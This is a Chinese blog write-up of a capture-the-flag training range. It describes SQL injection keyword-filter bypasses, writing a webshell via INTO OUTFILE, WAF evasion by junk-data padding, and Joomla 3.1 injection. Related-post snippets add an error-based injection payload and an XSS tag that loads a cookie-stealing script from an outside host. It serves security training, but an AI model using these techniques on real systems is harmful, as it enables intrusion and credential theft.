尤里的复仇II 回归【7题】

最新推荐文章于 2024-05-13 13:59:42 发布
最新推荐文章于 2024-05-13 13:59:42 发布
阅读量2.7k 收藏 10
点赞数 5
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/feiniaotjx/article/details/120913312
版权

尤里的复仇II 回归【7题】

渗透第一步-信息收集 1

扫目录,但是要从files目录扫,(看了wp才知到)
http://oovw8022.ia.aqlab.cn:8022/caidian/files/
在这里插入图片描述

渗透第一步-信息收集 2

这个cms在网上搜了,没有找到,应该是迷惑我们的
在这里插入图片描述

看使用说明得知是海熊cms
在这里插入图片描述
查询到了cms,就可以在网上找payload了(也可以自己测试)
在这里插入图片描述回显错误原因,尝试使用报错注入,成功
在这里插入图片描述查到flag表
在这里插入图片描述查到flag表里的字段flag
在这里插入图片描述查字段内容,得到flag
在这里插入图片描述

基础环境搭建

sqlmap尝鲜题

也可以使用sqlmap,得到数据库
在这里插入图片描述得表
在这里插入图片描述得字段
在这里插入图片描述
得flag
在这里插入图片描述

sql-注入绕过防护getshell

存在sql注入
在这里插入图片描述判断字段,为5
在这里插入图片描述

在这里插入图片描述
根据回显可看出过滤了union,select等相关语句,测试后,union需替换成un+union+ion,select可替换成seselectlect
在这里插入图片描述因为执行了sql语句后没有回显出内容,现在又两个方向,一个是报错注入,还有一个就是利用into outfile写入一句话木马。。

我先利用sql传入一句话木马(木马的<>也会被过滤,需要16进制编码,开头要加0x),语句被过滤了,尝试绕过
在这里插入图片描述将into替换成in+ into
将outfile替换成ououtfiletfile
更改路径(路径一般会有www,可依次尝试,或用burp去爆破)
写入成功
在这里插入图片描述连接shell
在这里插入图片描述
用菜刀连接,得到flag
在这里插入图片描述
再尝试报错注入
在这里插入图片描述得到数据库,之后查表,字段,字段内容,这里就不展示了
在这里插入图片描述

awd攻防靶场-fuzz乱拳打死老师傅

本题的意思是好像可能是收集信息爆破,不过我毫无头绪,只好从渗透开始

先识别cms,为Joomla cms
在这里插入图片描述
之后在网上寻找此cms的漏洞,不过识别出此cms的版本
在这里插入图片描述得到版本为3.1(还可以下载其源码,在源码上找到关于版本的页面)
在这里插入图片描述
之后开始找此cms的漏洞了,在网上找到适合此环境的漏洞,直接拿来用在这里插入图片描述被拦截了
在这里插入图片描述
可以尝试数据填充,可能就检查不到敏感数据了

在这里插入图片描述在这里插入图片描述可以开始查库了
在这里插入图片描述查表,结果把'过滤了,尝试使用16进制,也不行
在这里插入图片描述
在这里插入图片描述只能使用database()表示数据库了
在这里插入图片描述发现有很多表,我们可以用burp来跑
在这里插入图片描述设置相关参数
在这里插入图片描述

在这里插入图片描述存在#__user_flag
在这里插入图片描述
再查字段,得到id和passwd
在这里插入图片描述在这里插入图片描述开始查字段内容,得到用户idWhatsUp,
密码68e109f0f40ca72a15e05cc22786f8
在这里插入图片描述在这里插入图片描述解密出来为HelloWorld

登录后台,得到flag
在这里插入图片描述

归来-脚踏实地

登录到后台后,在http://awd19-b22.aqlab.cn/administrator/index.php?option=com_users&view=notes处(漏洞可在网上查到相应的exp),post参数filter[catgory]存在报错注入
在这里插入图片描述被拦截,还是可以进行脏数据处理
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述然后这个数据库是之前我们查过的库
在这里插入图片描述在这里插入图片描述

F。N 嘿嘿
关注
  • 5
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
封神台(尤里复仇回归)渗透第一步 信息收集1
Bu2n的博客
01-02 4713
前言解过程 前言 做这道的时候,我的心情真是跌宕起伏。。为什么这么说,且听我娓娓道来。 解过程 打开传送门,被传送到这个网站 随便点了几个模块,感觉都没有可利用的漏洞,直接扫描目录去了 扫到了admin目录,这个应该是后台登录网址,打开一看果然是 一开始密码暴力破解,没有破解到,开始有点烦躁。 (暴力破解.jpg)这里就不放burp破解的图了,有兴趣可以自己去试 然后想是否存在sql注入绕过密码登录的方法,试了试 无果 那报错注入呢? 输入 ' or gtid_subset(concat.
尤里复仇II 回归
sparename的博客
09-05 1458
尤里复仇II 回归归来-脚踏实地二级目录三级目录 归来-脚踏实地 进入页面,首先验证一下是不是cms模板 指纹验证:链接 在线cms指纹识别 当然也可以使用插件Wappalyzer来识别 得出此站为JoomlaCMS,去网上查下Joomla漏洞,发现他有很多版本,但不知道是什么版本,那怎么查版本呢,注意cms有文件,文件里面写明了版本号,所以我们只要找到写明cms版本的文件就可以了,但这个文件在哪,文件名我们并不知道,我们怎么找呢,很简单,因为cms模板里面内容可能会改,用cms建站文件名一般不会
封神台 尤里复仇II 回归 信息收集1&&2
shierbai的博客
05-13 201
正常去做信息收集时,看到config文件都是见猎心喜的,这里虽然没直接写flag,但也该多尝试,事实证明,这个尝试是正确的。这里说有sql注入,那么就要找注入点,之前把熊海cms这个指纹识别了,直接去搜索一波。其实在页面源码处也能看到一些可能存在sql注入的点,(这里也是到处点了一波,例如什么。一个可疑的files,一堆php和txt里脱颖而出,对files进行目录扫描。这里被遮住感觉是提示,但说了是基础目录扫描,御剑启动!找到这个,但感觉是后面可能用的,说明是熊海cms。
脚踏实地
我有一个Java梦
06-20 303
      昨天凯捷咨询面试归来,心中感慨万千,自己真正开始喜欢上Java是这个学期初,一下子像找到了归属感,狂啃这方面的书籍,不过主要的还是J2SE,对J2EE钻研的并不多。今天的二面部分面试官就问了一个让我现在想想很无奈的问,你知道JSF,当时我的回答是知道JFC,对JSF并不怎么熟悉,呵呵,一下子弄得很尴尬,然后我又补救说,对J2EE应用服务器有所了解(其实只是装了个Weblogic玩了一
封神台靶场尤里复仇I第一第二第五第六第七章解思路(持续更新)
weixin_50549897的博客
01-02 4628
提示:文## 标章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录一 .第一章二.第二章1.引入库2.读入数据一 .第六章总结 提示: 本文按照靶场目推进顺序进行,由于作者水平有限,有讲述不当之处敬请批评指出,有更好的解法欢迎在评论区发表。 本文将持续更新。靶场地址https://hack.zkaq.cn/battle 一 .第一章 **sql注入** 首先通过id=2判断是否存在sql注入 ![在这里插入图片描述](https://img-blog.csdnimg.cn/2021
sql一些技巧
zzx的博客
01-25 354
最近比较多事,很多地方都停滞不前,想来还是静下心来做些事比较好。 整理一些关于mysql的一些注入技巧,详细的可以到github里面看。里面 有完整的项目。 首先说来最基本的,大小写绕过,字符编码绕过,注释绕过,用||代替or,用&&代替and这些比较普遍的都是基本功,也就是说肯定是每个语句都要用到以上内容,这样可以省下很多时间, 而且,也不会有那么弱的网站对这些都不加以限制,所以这些算是起
尤里复仇WIN10全屏切换不黑屏补丁
07-29
尤里复仇WIN10全屏切换不黑屏补丁》是针对经典即时战略游戏《红色警戒2:尤里复仇》在Windows 10操作系统上运行时出现的全屏切换黑屏问而设计的一款补丁。这款补丁解决了许多玩家在尝试全屏游戏时遭遇的困扰,...
红色警戒尤里复仇魔改
01-16
《红色警戒尤里复仇魔改》是一款基于经典策略游戏《红色警戒2:尤里复仇》进行深度修改的游戏版本,旨在为玩家提供更加丰富、挑战性更强的游戏体验。在这个魔改版本中,开发者运用了高级的算法技术,如极小极大...
易语言红警2尤里复仇修改器源码.rar
12-18
《易语言红警2尤里复仇修改器源码解析与学习指南》 “易语言”是一种面向初学者的中文编程语言,旨在降低编程入门的难度。在这个“红警2尤里复仇修改器”的源码中,我们可以看到易语言在游戏修改领域的应用。红色...
YuriExtension:命令与征服尤里复仇的修复和扩展
06-10
它是什么? YuriExtension 是命令与征服 Yuri's Revenge 的修复和扩展,旨在在现代 Microsoft Windows 上运行。 目前可用的功能 使用 UDP 代替 IPX 能够在 Windows Vista 及更高版本上播放网络。...
尤里浏览器
02-07
尤里浏览器,自己做的。很烂的 下载下来看看可以,用就算了
渗透测试第一步(信息收集)
whoim_i的博客
04-04 4608
目录前言信息收集方式区别域名信息收集主域名信息子域名信息网络信息搜索旁站、c段信息收集绕过cdn获取真实ip网站架构分析服务器类型网站容器脚本类型数据库类型CMS类型WAF主机及端口扫描网站敏感目录和文件         ~~~~~~~~      &nbs...
封神台-尤里复仇II 回归sql-注入绕过防护getshell
m0_72592923的博客
01-14 666
封神台-尤里复仇II 回归sql-注入绕过防护getshell
渗透测试——信息收集(详细)
Ays.Ie的博客
03-10 4625
该篇详细记录了渗透测试的前期——信息收集
封神台(尤里复仇回归)绕过防护getshell
Bu2n的博客
01-05 3498
思路 习惯在url后加admin,看是不是管理后台。 一看发现是,就不用目录扫描工具了 填入正确的验证码,抓包输入',查看有无报错 发现报错了,存在报错注入,看报错描述可以知道是字符型注入 查看当前数据库 payload ' or extractvalue(1,concat(0x7e,database()))%23 查看当前库的所有表 payload ' or extractvalue(1,concat(0x7e,(select group_concat(table_name)from info
【封神台 - 掌控安全靶场】尤里复仇 Ⅰ 小芳!一二三四五六七章
热门推荐
algae
08-14 3万+
【封神台 - 掌控安全靶场】尤里复仇 小芳!第五章:进击!拿到Web最高权限!【配套课时:绕过防护上传木马实战演练】(等级:15) <script src = https://xsspt.com/nxqPZY?1597410463> </ script> cookie : ASPSESSIONIDSQDARATQ=KJFAFKEDEAPPFBEDHJFCIGIC; flag=zkz{xsser-g00d},ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNP
基于TRIZ创新理论的数据库设计
最新发布
06-07
TRIZ(Theory of Inventive Problem Solving)创新理论是由俄罗斯发明家阿列克谢·尤里耶维奇·杰尔吉耶夫斯基创立的一种通用问解决方法。它不是直接应用于数据库设计,但可以提供一种系统化的思维方式来改进设计过程。在数据库设计中,虽然TRIZ的核心原理不直接适用,但我们可以借鉴其分析问、寻找创新解决方案的理念。 例如,如果你遇到数据库设计中的性能瓶颈或复杂性问,TRIZ中的“标准解”(如40个标准解剖学原则)可以帮助你从不同角度审视问,比如利用数据冗余降低查询复杂性,或者通过优化数据结构提高查询速度。而“进化法则”和“技术矛盾”可以帮助你思考如何平衡不同需求之间的冲突。 然而,TRIZ更常用于软件工程、产品设计等领域的创新和问解决,所以在实际应用数据库设计时,可能需要结合领域专家的知识和关系数据库管理系统(RDBMS)的最佳实践,例如规范化、索引设计和SQL优化等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值